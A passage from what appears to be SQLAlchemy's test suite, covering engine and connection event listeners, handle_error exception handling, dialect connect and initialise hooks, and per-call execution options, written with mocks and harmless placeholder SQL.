assert_raises(
tsa.exc.ArgumentError,
event.listen,
engine,
"begin",
tracker("begin"),
retval=True,
)
event.listen(engine, "before_execute", execute, retval=True)
event.listen(
engine, "before_cursor_execute", cursor_execute, retval=True
)
with engine.connect() as conn:
conn.execute(select(1))
eq_(canary, ["execute", "cursor_execute"])
@testing.requires.legacy_engine
def test_engine_connect(self):
engine = engines.testing_engine()
tracker = Mock()
event.listen(engine, "engine_connect", tracker)
c1 = engine.connect()
c2 = c1._branch()
c1.close()
eq_(tracker.mock_calls, [call(c1, False), call(c2, True)])
def test_execution_options(self):
engine = engines.testing_engine()
engine_tracker = Mock()
conn_tracker = Mock()
event.listen(engine, "set_engine_execution_options", engine_tracker)
event.listen(engine, "set_connection_execution_options", conn_tracker)
e2 = engine.execution_options(e1="opt_e1")
c1 = engine.connect()
c2 = c1.execution_options(c1="opt_c1")
c3 = e2.connect()
c4 = c3.execution_options(c3="opt_c3")
eq_(engine_tracker.mock_calls, [call(e2, {"e1": "opt_e1"})])
eq_(
conn_tracker.mock_calls,
[call(c2, {"c1": "opt_c1"}), call(c4, {"c3": "opt_c3"})],
)
@testing.requires.sequences
@testing.provide_metadata
def test_cursor_execute(self):
canary = []
def tracker(name):
def go(conn, cursor, statement, parameters, context, executemany):
canary.append((statement, context))
return go
engine = engines.testing_engine()
t = Table(
"t",
self.metadata,
Column(
"x",
Integer,
Sequence("t_id_seq"),
primary_key=True,
),
implicit_returning=False,
)
self.metadata.create_all(engine)
with engine.begin() as conn:
event.listen(
conn, "before_cursor_execute", tracker("cursor_execute")
)
conn.execute(t.insert())
# we see the sequence pre-executed in the first call
assert "t_id_seq" in canary[0][0]
assert "INSERT" in canary[1][0]
# same context
is_(canary[0][1], canary[1][1])
def test_transactional(self):
canary = []
def tracker(name):
def go(conn, *args, **kw):
canary.append(name)
return go
engine = engines.testing_engine()
event.listen(engine, "before_execute", tracker("execute"))
event.listen(
engine, "before_cursor_execute", tracker("cursor_execute")
)
event.listen(engine, "begin", tracker("begin"))
event.listen(engine, "commit", tracker("commit"))
event.listen(engine, "rollback", tracker("rollback"))
with engine.connect() as conn:
trans = conn.begin()
conn.execute(select(1))
trans.rollback()
trans = conn.begin()
conn.execute(select(1))
trans.commit()
eq_(
canary,
[
"begin",
"execute",
"cursor_execute",
"rollback",
"begin",
"execute",
"cursor_execute",
"commit",
],
)
def test_transactional_named(self):
canary = []
def tracker(name):
def go(*args, **kw):
canary.append((name, set(kw)))
return go
engine = engines.testing_engine()
event.listen(engine, "before_execute", tracker("execute"), named=True)
event.listen(
engine,
"before_cursor_execute",
tracker("cursor_execute"),
named=True,
)
event.listen(engine, "begin", tracker("begin"), named=True)
event.listen(engine, "commit", tracker("commit"), named=True)
event.listen(engine, "rollback", tracker("rollback"), named=True)
with engine.connect() as conn:
trans = conn.begin()
conn.execute(select(1))
trans.rollback()
trans = conn.begin()
conn.execute(select(1))
trans.commit()
eq_(
canary,
[
("begin", set(["conn"])),
(
"execute",
set(
[
"conn",
"clauseelement",
"multiparams",
"params",
"execution_options",
]
),
),
(
"cursor_execute",
set(
[
"conn",
"cursor",
"executemany",
"statement",
"parameters",
"context",
]
),
),
("rollback", set(["conn"])),
("begin", set(["conn"])),
(
"execute",
set(
[
"conn",
"clauseelement",
"multiparams",
"params",
"execution_options",
]
),
),
(
"cursor_execute",
set(
[
"conn",
"cursor",
"executemany",
"statement",
"parameters",
"context",
]
),
),
("commit", set(["conn"])),
],
)
@testing.requires.savepoints
@testing.requires.two_phase_transactions
def test_transactional_advanced(self):
canary1 = []
def tracker1(name):
def go(*args, **kw):
canary1.append(name)
return go
canary2 = []
def tracker2(name):
def go(*args, **kw):
canary2.append(name)
return go
engine = engines.testing_engine()
for name in [
"begin",
"savepoint",
"rollback_savepoint",
"release_savepoint",
"rollback",
"begin_twophase",
"prepare_twophase",
"commit_twophase",
]:
event.listen(engine, "%s" % name, tracker1(name))
conn = engine.connect()
for name in [
"begin",
"savepoint",
"rollback_savepoint",
"release_savepoint",
"rollback",
"begin_twophase",
"prepare_twophase",
"commit_twophase",
]:
event.listen(conn, "%s" % name, tracker2(name))
trans = conn.begin()
trans2 = conn.begin_nested()
conn.execute(select(1))
trans2.rollback()
trans2 = conn.begin_nested()
conn.execute(select(1))
trans2.commit()
trans.rollback()
trans = conn.begin_twophase()
conn.execute(select(1))
trans.prepare()
trans.commit()
eq_(
canary1,
[
"begin",
"savepoint",
"rollback_savepoint",
"savepoint",
"release_savepoint",
"rollback",
"begin_twophase",
"prepare_twophase",
"commit_twophase",
],
)
eq_(
canary2,
[
"begin",
"savepoint",
"rollback_savepoint",
"savepoint",
"release_savepoint",
"rollback",
"begin_twophase",
"prepare_twophase",
"commit_twophase",
],
)
class FutureEngineEventsTest(fixtures.FutureEngineMixin, EngineEventsTest):
def test_future_fixture(self, testing_engine):
e1 = testing_engine()
assert e1._is_future
with e1.connect() as conn:
assert conn._is_future
def test_emit_sql_in_autobegin(self, testing_engine):
e1 = testing_engine(config.db_url)
canary = Mock()
@event.listens_for(e1, "begin")
def begin(connection):
result = connection.execute(select(1)).scalar()
canary.got_result(result)
with e1.connect() as conn:
assert conn._is_future
conn.execute(select(1)).scalar()
assert conn.in_transaction()
conn.commit()
assert not conn.in_transaction()
eq_(canary.mock_calls, [call.got_result(1)])
class HandleErrorTest(fixtures.TestBase):
__requires__ = ("ad_hoc_engines",)
__backend__ = True
def teardown_test(self):
Engine.dispatch._clear()
Engine._has_events = False
def test_handle_error(self):
engine = engines.testing_engine()
canary = Mock(return_value=None)
event.listen(engine, "handle_error", canary)
with engine.connect() as conn:
try:
conn.exec_driver_sql("SELECT FOO FROM I_DONT_EXIST")
assert False
except tsa.exc.DBAPIError as e:
ctx = canary.mock_calls[0][1][0]
eq_(ctx.original_exception, e.orig)
is_(ctx.sqlalchemy_exception, e)
eq_(ctx.statement, "SELECT FOO FROM I_DONT_EXIST")
def test_exception_event_reraise(self):
engine = engines.testing_engine()
class MyException(Exception):
pass
@event.listens_for(engine, "handle_error", retval=True)
def err(context):
stmt = context.statement
exception = context.original_exception
if "ERROR ONE" in str(stmt):
return MyException("my exception")
elif "ERROR TWO" in str(stmt):
return exception
else:
return None
conn = engine.connect()
# case 1: custom exception
assert_raises_message(
MyException,
"my exception",
conn.exec_driver_sql,
"SELECT 'ERROR ONE' FROM I_DONT_EXIST",
)
# case 2: return the DBAPI exception we're given;
# no wrapping should occur
assert_raises(
conn.dialect.dbapi.Error,
conn.exec_driver_sql,
"SELECT 'ERROR TWO' FROM I_DONT_EXIST",
)
# case 3: normal wrapping
assert_raises(
tsa.exc.DBAPIError,
conn.exec_driver_sql,
"SELECT 'ERROR THREE' FROM I_DONT_EXIST",
)
def test_exception_event_reraise_chaining(self):
engine = engines.testing_engine()
class MyException1(Exception):
pass
class MyException2(Exception):
pass
class MyException3(Exception):
pass
@event.listens_for(engine, "handle_error", retval=True)
def err1(context):
stmt = context.statement
if (
"ERROR ONE" in str(stmt)
or "ERROR TWO" in str(stmt)
or "ERROR THREE" in str(stmt)
):
return MyException1("my exception")
elif "ERROR FOUR" in str(stmt):
raise MyException3("my exception short circuit")
@event.listens_for(engine, "handle_error", retval=True)
def err2(context):
stmt = context.statement
if (
"ERROR ONE" in str(stmt) or "ERROR FOUR" in str(stmt)
) and isinstance(context.chained_exception, MyException1):
raise MyException2("my exception chained")
elif "ERROR TWO" in str(stmt):
return context.chained_exception
else:
return None
conn = engine.connect()
with patch.object(
engine.dialect.execution_ctx_cls, "handle_dbapi_exception"
) as patched:
assert_raises_message(
MyException2,
"my exception chained",
conn.exec_driver_sql,
"SELECT 'ERROR ONE' FROM I_DONT_EXIST",
)
eq_(patched.call_count, 1)
with patch.object(
engine.dialect.execution_ctx_cls, "handle_dbapi_exception"
) as patched:
assert_raises(
MyException1,
conn.exec_driver_sql,
"SELECT 'ERROR TWO' FROM I_DONT_EXIST",
)
eq_(patched.call_count, 1)
with patch.object(
engine.dialect.execution_ctx_cls, "handle_dbapi_exception"
) as patched:
            # test that a non-None return from err1 isn't cancelled
            # out by err2
assert_raises(
MyException1,
conn.exec_driver_sql,
"SELECT 'ERROR THREE' FROM I_DONT_EXIST",
)
eq_(patched.call_count, 1)
with patch.object(
engine.dialect.execution_ctx_cls, "handle_dbapi_exception"
) as patched:
assert_raises(
tsa.exc.DBAPIError,
conn.exec_driver_sql,
"SELECT 'ERROR FIVE' FROM I_DONT_EXIST",
)
eq_(patched.call_count, 1)
with patch.object(
engine.dialect.execution_ctx_cls, "handle_dbapi_exception"
) as patched:
assert_raises_message(
MyException3,
"my exception short circuit",
conn.exec_driver_sql,
"SELECT 'ERROR FOUR' FROM I_DONT_EXIST",
)
eq_(patched.call_count, 1)
def test_exception_autorollback_fails(self):
engine = engines.testing_engine()
conn = engine.connect()
def boom(connection):
raise engine.dialect.dbapi.OperationalError("rollback failed")
with expect_warnings(
r"An exception has occurred during handling of a previous "
r"exception. The previous exception "
r"is.*(?:i_dont_exist|does not exist)",
py2konly=True,
):
with patch.object(conn.dialect, "do_rollback", boom):
assert_raises_message(
tsa.exc.OperationalError,
"rollback failed",
conn.exec_driver_sql,
"insert into i_dont_exist (x) values ('y')",
)
def test_exception_event_ad_hoc_context(self):
"""test that handle_error is called with a context in
cases where _handle_dbapi_error() is normally called without
any context.
"""
engine = engines.testing_engine()
listener = Mock(return_value=None)
event.listen(engine, "handle_error", listener)
nope = SomeException("nope")
class MyType(TypeDecorator):
impl = Integer
cache_ok = True
def process_bind_param(self, value, dialect):
raise nope
with engine.connect() as conn:
assert_raises_message(
tsa.exc.StatementError,
r"\(.*.SomeException\) " r"nope\n\[SQL\: u?SELECT 1 ",
conn.execute,
select(1).where(column("foo") == literal("bar", MyType())),
)
ctx = listener.mock_calls[0][1][0]
assert ctx.statement.startswith("SELECT 1 ")
is_(ctx.is_disconnect, False)
is_(ctx.original_exception, nope)
def test_exception_event_non_dbapi_error(self):
"""test that handle_error is called with a context in
cases where DBAPI raises an exception that is not a DBAPI
exception, e.g. internal errors or encoding problems.
"""
engine = engines.testing_engine()
listener = Mock(return_value=None)
event.listen(engine, "handle_error", listener)
nope = TypeError("I'm not a DBAPI error")
with engine.connect() as c:
c.connection.cursor = Mock(
return_value=Mock(execute=Mock(side_effect=nope))
)
assert_raises_message(
TypeError,
"I'm not a DBAPI error",
c.exec_driver_sql,
"select ",
)
ctx = listener.mock_calls[0][1][0]
eq_(ctx.statement, "select ")
is_(ctx.is_disconnect, False)
is_(ctx.original_exception, nope)
def test_exception_event_disable_handlers(self):
engine = engines.testing_engine()
class MyException1(Exception):
pass
@event.listens_for(engine, "handle_error")
def err1(context):
stmt = context.statement
if "ERROR_ONE" in str(stmt):
raise MyException1("my exception short circuit")
with engine.connect() as conn:
assert_raises(
tsa.exc.DBAPIError,
conn.execution_options(
skip_user_error_events=True
).exec_driver_sql,
"SELECT ERROR_ONE FROM I_DONT_EXIST",
)
assert_raises(
MyException1,
conn.execution_options(
skip_user_error_events=False
).exec_driver_sql,
"SELECT ERROR_ONE FROM I_DONT_EXIST",
)
def _test_alter_disconnect(self, orig_error, evt_value):
engine = engines.testing_engine()
@event.listens_for(engine, "handle_error")
def evt(ctx):
ctx.is_disconnect = evt_value
with patch.object(
engine.dialect, "is_disconnect", Mock(return_value=orig_error)
):
with engine.connect() as c:
try:
c.exec_driver_sql("SELECT x FROM nonexistent")
assert False
except tsa.exc.StatementError as st:
eq_(st.connection_invalidated, evt_value)
def test_alter_disconnect_to_true(self):
self._test_alter_disconnect(False, True)
self._test_alter_disconnect(True, True)
def test_alter_disconnect_to_false(self):
self._test_alter_disconnect(True, False)
self._test_alter_disconnect(False, False)
@testing.requires.independent_connections
def _test_alter_invalidate_pool_to_false(self, set_to_false):
orig_error = True
engine = engines.testing_engine()
@event.listens_for(engine, "handle_error")
def evt(ctx):
if set_to_false:
ctx.invalidate_pool_on_disconnect = False
c1, c2, c3 = (
engine.pool.connect(),
engine.pool.connect(),
engine.pool.connect(),
)
crecs = [conn._connection_record for conn in (c1, c2, c3)]
c1.close()
c2.close()
c3.close()
with patch.object(
engine.dialect, "is_disconnect", Mock(return_value=orig_error)
):
with engine.connect() as c:
target_crec = c.connection._connection_record
try:
c.exec_driver_sql("SELECT x FROM nonexistent")
assert False
except tsa.exc.StatementError as st:
eq_(st.connection_invalidated, True)
for crec in crecs:
if crec is target_crec or not set_to_false:
is_not(crec.dbapi_connection, crec.get_connection())
else:
is_(crec.dbapi_connection, crec.get_connection())
def test_alter_invalidate_pool_to_false(self):
self._test_alter_invalidate_pool_to_false(True)
def test_alter_invalidate_pool_stays_true(self):
self._test_alter_invalidate_pool_to_false(False)
def test_handle_error_event_connect_isolation_level(self):
engine = engines.testing_engine()
class MySpecialException(Exception):
pass
@event.listens_for(engine, "handle_error")
def handle_error(ctx):
raise MySpecialException("failed operation")
ProgrammingError = engine.dialect.dbapi.ProgrammingError
with engine.connect() as conn:
with patch.object(
conn.dialect,
"get_isolation_level",
Mock(side_effect=ProgrammingError("random error")),
):
assert_raises(MySpecialException, conn.get_isolation_level)
@testing.only_on("sqlite+pysqlite")
def test_cursor_close_resultset_failed_connectionless(self):
engine = engines.testing_engine()
the_conn = []
the_cursor = []
@event.listens_for(engine, "after_cursor_execute")
def go(
connection, cursor, statement, parameters, context, executemany
):
the_cursor.append(cursor)
the_conn.append(connection)
with mock.patch(
"sqlalchemy.engine.cursor.BaseCursorResult.__init__",
Mock(side_effect=tsa.exc.InvalidRequestError("duplicate col")),
):
with engine.connect() as conn:
assert_raises(
tsa.exc.InvalidRequestError,
conn.execute,
text("select 1"),
)
# cursor is closed
assert_raises_message(
engine.dialect.dbapi.ProgrammingError,
"Cannot operate on a closed cursor",
the_cursor[0].execute,
"select 1",
)
# connection is closed
assert the_conn[0].closed
@testing.only_on("sqlite+pysqlite")
def test_cursor_close_resultset_failed_explicit(self):
engine = engines.testing_engine()
the_cursor = []
@event.listens_for(engine, "after_cursor_execute")
def go(
connection, cursor, statement, parameters, context, executemany
):
the_cursor.append(cursor)
conn = engine.connect()
with mock.patch(
"sqlalchemy.engine.cursor.BaseCursorResult.__init__",
Mock(side_effect=tsa.exc.InvalidRequestError("duplicate col")),
):
assert_raises(
tsa.exc.InvalidRequestError,
conn.execute,
text("select 1"),
)
# cursor is closed
assert_raises_message(
engine.dialect.dbapi.ProgrammingError,
"Cannot operate on a closed cursor",
the_cursor[0].execute,
"select 1",
)
# connection not closed
assert not conn.closed
conn.close()
class OnConnectTest(fixtures.TestBase):
__requires__ = ("sqlite",)
def setup_test(self):
e = create_engine("sqlite://")
connection = Mock(get_server_version_info=Mock(return_value="5.0"))
def connect(*args, **kwargs):
return connection
dbapi = Mock(
sqlite_version_info=(99, 9, 9),
version_info=(99, 9, 9),
sqlite_version="99.9.9",
paramstyle="named",
connect=Mock(side_effect=connect),
)
sqlite3 = e.dialect.dbapi
dbapi.Error = (sqlite3.Error,)
dbapi.ProgrammingError = sqlite3.ProgrammingError
self.dbapi = dbapi
self.ProgrammingError = sqlite3.ProgrammingError
def test_wraps_connect_in_dbapi(self):
dbapi = self.dbapi
dbapi.connect = Mock(side_effect=self.ProgrammingError("random error"))
try:
create_engine("sqlite://", module=dbapi).connect()
assert False
except tsa.exc.DBAPIError as de:
assert not de.connection_invalidated
def test_handle_error_event_connect(self):
dbapi = self.dbapi
dbapi.connect = Mock(side_effect=self.ProgrammingError("random error"))
class MySpecialException(Exception):
pass
eng = create_engine("sqlite://", module=dbapi)
@event.listens_for(eng, "handle_error")
def handle_error(ctx):
assert ctx.engine is eng
assert ctx.connection is None
raise MySpecialException("failed operation")
assert_raises(MySpecialException, eng.connect)
def test_handle_error_event_revalidate(self):
dbapi = self.dbapi
class MySpecialException(Exception):
pass
eng = create_engine("sqlite://", module=dbapi, _initialize=False)
@event.listens_for(eng, "handle_error")
def handle_error(ctx):
assert ctx.engine is eng
assert ctx.connection is conn
assert isinstance(
ctx.sqlalchemy_exception, tsa.exc.ProgrammingError
)
raise MySpecialException("failed operation")
conn = eng.connect()
conn.invalidate()
dbapi.connect = Mock(side_effect=self.ProgrammingError("random error"))
assert_raises(MySpecialException, getattr, conn, "connection")
def test_handle_error_event_implicit_revalidate(self):
dbapi = self.dbapi
class MySpecialException(Exception):
pass
eng = create_engine("sqlite://", module=dbapi, _initialize=False)
@event.listens_for(eng, "handle_error")
def handle_error(ctx):
assert ctx.engine is eng
assert ctx.connection is conn
assert isinstance(
ctx.sqlalchemy_exception, tsa.exc.ProgrammingError
)
raise MySpecialException("failed operation")
conn = eng.connect()
conn.invalidate()
dbapi.connect = Mock(side_effect=self.ProgrammingError("random error"))
assert_raises(MySpecialException, conn.execute, select(1))
def test_handle_error_custom_connect(self):
dbapi = self.dbapi
class MySpecialException(Exception):
pass
def custom_connect():
raise self.ProgrammingError("random error")
eng = create_engine("sqlite://", module=dbapi, creator=custom_connect)
@event.listens_for(eng, "handle_error")
def handle_error(ctx):
assert ctx.engine is eng
assert ctx.connection is None
raise MySpecialException("failed operation")
assert_raises(MySpecialException, eng.connect)
def test_handle_error_event_connect_invalidate_flag(self):
dbapi = self.dbapi
dbapi.connect = Mock(
side_effect=self.ProgrammingError(
"Cannot operate on a closed database."
)
)
class MySpecialException(Exception):
pass
eng = create_engine("sqlite://", module=dbapi)
@event.listens_for(eng, "handle_error")
def handle_error(ctx):
assert ctx.is_disconnect
ctx.is_disconnect = False
try:
eng.connect()
assert False
except tsa.exc.DBAPIError as de:
assert not de.connection_invalidated
def test_cant_connect_stay_invalidated(self):
class MySpecialException(Exception):
pass
eng = create_engine("sqlite://")
@event.listens_for(eng, "handle_error")
def handle_error(ctx):
assert ctx.is_disconnect
conn = eng.connect()
conn.invalidate()
eng.pool._creator = Mock(
side_effect=self.ProgrammingError(
"Cannot operate on a closed database."
)
)
try:
conn.connection
assert False
except tsa.exc.DBAPIError:
assert conn.invalidated
def test_dont_touch_non_dbapi_exception_on_connect(self):
dbapi = self.dbapi
dbapi.connect = Mock(side_effect=TypeError("I'm not a DBAPI error"))
e = create_engine("sqlite://", module=dbapi)
e.dialect.is_disconnect = is_disconnect = Mock()
assert_raises_message(TypeError, "I'm not a DBAPI error", e.connect)
eq_(is_disconnect.call_count, 0)
def test_ensure_dialect_does_is_disconnect_no_conn(self):
"""test that is_disconnect() doesn't choke if no connection,
cursor given."""
dialect = testing.db.dialect
dbapi = dialect.dbapi
assert not dialect.is_disconnect(
dbapi.OperationalError("test"), None, None
)
def test_invalidate_on_connect(self):
"""test that is_disconnect() is called during connect.
        Interpretation of connection failures is not supported by
        every backend.
"""
dbapi = self.dbapi
dbapi.connect = Mock(
side_effect=self.ProgrammingError(
"Cannot operate on a closed database."
)
)
e = create_engine("sqlite://", module=dbapi)
try:
e.connect()
assert False
except tsa.exc.DBAPIError as de:
assert de.connection_invalidated
@testing.only_on("sqlite+pysqlite")
def test_initialize_connect_calls(self):
"""test for :ticket:`5497`, on_connect not called twice"""
m1 = Mock()
cls_ = testing.db.dialect.__class__
class SomeDialect(cls_):
def initialize(self, connection):
super(SomeDialect, self).initialize(connection)
m1.initialize(connection)
def on_connect(self):
oc = super(SomeDialect, self).on_connect()
def my_on_connect(conn):
if oc:
oc(conn)
m1.on_connect(conn)
return my_on_connect
u1 = Mock(
username=None,
password=None,
host=None,
port=None,
query={},
database=None,
_instantiate_plugins=lambda kw: (u1, [], kw),
_get_entrypoint=Mock(
return_value=Mock(get_dialect_cls=lambda u: SomeDialect)
),
)
eng = create_engine(u1, poolclass=QueuePool)
# make sure other dialects aren't getting pulled in here
eq_(eng.name, "sqlite")
c = eng.connect()
dbapi_conn_one = c.connection.dbapi_connection
c.close()
eq_(
m1.mock_calls,
[call.on_connect(dbapi_conn_one), call.initialize(mock.ANY)],
)
c = eng.connect()
eq_(
m1.mock_calls,
[call.on_connect(dbapi_conn_one), call.initialize(mock.ANY)],
)
c2 = eng.connect()
dbapi_conn_two = c2.connection.dbapi_connection
is_not(dbapi_conn_one, dbapi_conn_two)
eq_(
m1.mock_calls,
[
call.on_connect(dbapi_conn_one),
call.initialize(mock.ANY),
call.on_connect(dbapi_conn_two),
],
)
c.close()
c2.close()
@testing.only_on("sqlite+pysqlite")
def test_initialize_connect_race(self):
"""test for :ticket:`6337` fixing the regression in :ticket:`5497`,
dialect init is mutexed"""
m1 = []
cls_ = testing.db.dialect.__class__
class SomeDialect(cls_):
def initialize(self, connection):
super(SomeDialect, self).initialize(connection)
m1.append("initialize")
def on_connect(self):
oc = super(SomeDialect, self).on_connect()
def my_on_connect(conn):
if oc:
oc(conn)
m1.append("on_connect")
return my_on_connect
u1 = Mock(
username=None,
password=None,
host=None,
port=None,
query={},
database=None,
_instantiate_plugins=lambda kw: (u1, [], kw),
_get_entrypoint=Mock(
return_value=Mock(get_dialect_cls=lambda u: SomeDialect)
),
)
for j in range(5):
m1[:] = []
eng = create_engine(
u1,
poolclass=NullPool,
connect_args={"check_same_thread": False},
)
def go():
c = eng.connect()
c.execute(text("select 1"))
c.close()
threads = [threading.Thread(target=go) for i in range(10)]
for t in threads:
t.start()
for t in threads:
t.join()
eq_(m1, ["on_connect", "initialize"] + ["on_connect"] * 9)
class DialectEventTest(fixtures.TestBase):
@contextmanager
def _run_test(self, retval):
m1 = Mock()
m1.do_execute.return_value = retval
m1.do_executemany.return_value = retval
m1.do_execute_no_params.return_value = retval
e = engines.testing_engine(options={"_initialize": False})
event.listen(e, "do_execute", m1.do_execute)
event.listen(e, "do_executemany", m1.do_executemany)
event.listen(e, "do_execute_no_params", m1.do_execute_no_params)
e.dialect.do_execute = m1.real_do_execute
e.dialect.do_executemany = m1.real_do_executemany
e.dialect.do_execute_no_params = m1.real_do_execute_no_params
def mock_the_cursor(cursor, *arg):
arg[-1].get_result_proxy = Mock(return_value=Mock(context=arg[-1]))
return retval
m1.real_do_execute.side_effect = (
m1.do_execute.side_effect
) = mock_the_cursor
m1.real_do_executemany.side_effect = (
m1.do_executemany.side_effect
) = mock_the_cursor
m1.real_do_execute_no_params.side_effect = (
m1.do_execute_no_params.side_effect
) = mock_the_cursor
with e.begin() as conn:
yield conn, m1
def _assert(self, retval, m1, m2, mock_calls):
eq_(m1.mock_calls, mock_calls)
if retval:
eq_(m2.mock_calls, [])
else:
eq_(m2.mock_calls, mock_calls)
def _test_do_execute(self, retval):
with self._run_test(retval) as (conn, m1):
result = conn.exec_driver_sql(
"insert into table foo", {"foo": "bar"}
)
self._assert(
retval,
m1.do_execute,
m1.real_do_execute,
[
call(
result.context.cursor,
"insert into table foo",
{"foo": "bar"},
result.context,
)
],
)
def _test_do_executemany(self, retval):
with self._run_test(retval) as (conn, m1):
result = conn.exec_driver_sql(
"insert into table foo", [{"foo": "bar"}, {"foo": "bar"}]
)
self._assert(
retval,
m1.do_executemany,
m1.real_do_executemany,
[
call(
result.context.cursor,
"insert into table foo",
[{"foo": "bar"}, {"foo": "bar"}],
result.context,
)
],
)
def _test_do_execute_no_params(self, retval):
with self._run_test(retval) as (conn, m1):
result = conn.execution_options(
no_parameters=True
).exec_driver_sql("insert into table foo")
self._assert(
retval,
m1.do_execute_no_params,
m1.real_do_execute_no_params,
[
call(
result.context.cursor,
"insert into table foo",
result.context,
)
],
)
def _test_cursor_execute(self, retval):
with self._run_test(retval) as (conn, m1):
dialect = conn.dialect
stmt = "insert into table foo"
params = {"foo": "bar"}
ctx = dialect.execution_ctx_cls._init_statement(
dialect,
conn,
conn.connection,
{},
stmt,
[params],
)
conn._cursor_execute(ctx.cursor, stmt, params, ctx)
self._assert(
retval,
m1.do_execute,
m1.real_do_execute,
[call(ctx.cursor, "insert into table foo", {"foo": "bar"}, ctx)],
)
def test_do_execute_w_replace(self):
self._test_do_execute(True)
def test_do_execute_wo_replace(self):
self._test_do_execute(False)
def test_do_executemany_w_replace(self):
self._test_do_executemany(True)
def test_do_executemany_wo_replace(self):
self._test_do_executemany(False)
def test_do_execute_no_params_w_replace(self):
self._test_do_execute_no_params(True)
def test_do_execute_no_params_wo_replace(self):
self._test_do_execute_no_params(False)
def test_cursor_execute_w_replace(self):
self._test_cursor_execute(True)
def test_cursor_execute_wo_replace(self):
self._test_cursor_execute(False)
def test_connect_replace_params(self):
e = engines.testing_engine(options={"_initialize": False})
@event.listens_for(e, "do_connect")
def evt(dialect, conn_rec, cargs, cparams):
cargs[:] = ["foo", "hoho"]
cparams.clear()
cparams["bar"] = "bat"
conn_rec.info["boom"] = "bap"
m1 = Mock()
e.dialect.connect = m1.real_connect
with e.connect() as conn:
eq_(m1.mock_calls, [call.real_connect("foo", "hoho", bar="bat")])
eq_(conn.info["boom"], "bap")
def test_connect_do_connect(self):
e = engines.testing_engine(options={"_initialize": False})
m1 = Mock()
@event.listens_for(e, "do_connect")
def evt1(dialect, conn_rec, cargs, cparams):
cargs[:] = ["foo", "hoho"]
cparams.clear()
cparams["bar"] = "bat"
conn_rec.info["boom"] = "one"
@event.listens_for(e, "do_connect")
def evt2(dialect, conn_rec, cargs, cparams):
conn_rec.info["bap"] = "two"
return m1.our_connect(cargs, cparams)
with e.connect() as conn:
# called with args
eq_(
m1.mock_calls,
[call.our_connect(["foo", "hoho"], {"bar": "bat"})],
)
eq_(conn.info["boom"], "one")
eq_(conn.info["bap"], "two")
# returned our mock connection
is_(conn.connection.dbapi_connection, m1.our_connect())
def test_connect_do_connect_info_there_after_recycle(self):
# test that info is maintained after the do_connect()
# event for a soft invalidation.
e = engines.testing_engine(options={"_initialize": False})
@event.listens_for(e, "do_connect")
def evt1(dialect, conn_rec, cargs, cparams):
conn_rec.info["boom"] = "one"
conn = e.connect()
eq_(conn.info["boom"], "one")
conn.connection.invalidate(soft=True)
conn.close()
conn = e.connect()
eq_(conn.info["boom"], "one")
def test_connect_do_connect_info_there_after_invalidate(self):
# test that info is maintained after the do_connect()
# event for a hard invalidation.
e = engines.testing_engine(options={"_initialize": False})
@event.listens_for(e, "do_connect")
def evt1(dialect, conn_rec, cargs, cparams):
assert not conn_rec.info
conn_rec.info["boom"] = "one"
conn = e.connect()
eq_(conn.info["boom"], "one")
conn.connection.invalidate()
conn = e.connect()
eq_(conn.info["boom"], "one")
class FutureExecuteTest(fixtures.FutureEngineMixin, fixtures.TablesTest):
__backend__ = True
@classmethod
def define_tables(cls, metadata):
Table(
"users",
metadata,
Column("user_id", INT, primary_key=True, autoincrement=False),
Column("user_name", VARCHAR(20)),
test_needs_acid=True,
)
Table(
"users_autoinc",
metadata,
Column(
"user_id", INT, primary_key=True, test_needs_autoincrement=True
),
Column("user_name", VARCHAR(20)),
test_needs_acid=True,
)
def test_non_dict_mapping(self, connection):
"""ensure arbitrary Mapping works for execute()"""
class NotADict(collections_abc.Mapping):
def __init__(self, _data):
self._data = _data
def __iter__(self):
return iter(self._data)
def __len__(self):
return len(self._data)
def __getitem__(self, key):
return self._data[key]
def keys(self):
return self._data.keys()
nd = NotADict({"a": 10, "b": 15})
eq_(dict(nd), {"a": 10, "b": 15})
result = connection.execute(
select(
bindparam("a", type_=Integer), bindparam("b", type_=Integer)
),
nd,
)
eq_(result.first(), (10, 15))
def test_row_works_as_mapping(self, connection):
"""ensure the RowMapping object works as a parameter dictionary for
execute."""
result = connection.execute(
select(literal(10).label("a"), literal(15).label("b"))
)
row = result.first()
eq_(row, (10, 15))
eq_(row._mapping, {"a": 10, "b": 15})
result = connection.execute(
select(
bindparam("a", type_=Integer).label("a"),
bindparam("b", type_=Integer).label("b"),
),
row._mapping,
)
row = result.first()
eq_(row, (10, 15))
eq_(row._mapping, {"a": 10, "b": 15})
@testing.combinations(
({}, {}, {}),
({"a": "b"}, {}, {"a": "b"}),
({"a": "b", "d": "e"}, {"a": "c"}, {"a": "c", "d": "e"}),
argnames="conn_opts, exec_opts, expected",
)
def test_execution_opts_per_invoke(
self, connection, conn_opts, exec_opts, expected
):
opts = []
@event.listens_for(connection, "before_cursor_execute")
def before_cursor_execute(
conn, cursor, statement, parameters, context, executemany
):
opts.append(context.execution_options)
if conn_opts:
connection = connection.execution_options(**conn_opts)
if exec_opts:
connection.execute(select(1), execution_options=exec_opts)
else:
connection.execute(select(1))
eq_(opts, [expected])
@testing.combinations(
({}, {}, {}, {}),
({}, {"a": "b"}, {}, {"a": "b"}),
({}, {"a": "b", "d": "e"}, {"a": "c"}, {"a": "c", "d": "e"}),
(
{"q": "z", "p": "r"},
{"a": "b", "p": "x", "d": "e"},
{"a": "c"},
{"q": "z", "p": "x", "a": "c", "d": "e"},
),
argnames="stmt_opts, conn_opts, exec_opts, expected",
)
def test_execution_opts_per_invoke_execute_events(
self, connection, stmt_opts, conn_opts, exec_opts, expected
):
opts = []
@event.listens_for(connection, "before_execute")
def before_execute(
conn, clauseelement, multiparams, params, execution_options
):
opts.append(("before", execution_options))
@event.listens_for(connection, "after_execute")
def after_execute(
conn,
clauseelement,
multiparams,
params,
execution_options,
result,
):
opts.append(("after", execution_options))
stmt = select(1)
if stmt_opts:
stmt = stmt.execution_options(**stmt_opts)
if conn_opts:
connection = connection.execution_options(**conn_opts)
if exec_opts:
connection.execute(stmt, execution_options=exec_opts)
else:
connection.execute(stmt)
eq_(opts, [("before", expected), ("after", expected)])
def test_no_branching(self, connection):
with testing.expect_deprecated(
r"The Connection.connect\(\) method is considered legacy"
):
assert_raises_message(
NotImplementedError,
"sqlalchemy.future.Connection does not support "
"'branching' of new connections.",
connection.connect,
)
class SetInputSizesTest(fixtures.TablesTest):
__backend__ = True
__requires__ = ("independent_connections",)
@classmethod
def define_tables(cls, metadata):
Table(
"users",
metadata,
Column("user_id", INT, primary_key=True, autoincrement=False),
Column("user_name", VARCHAR(20)),
)
@testing.fixture
def input_sizes_fixture(self, testing_engine):
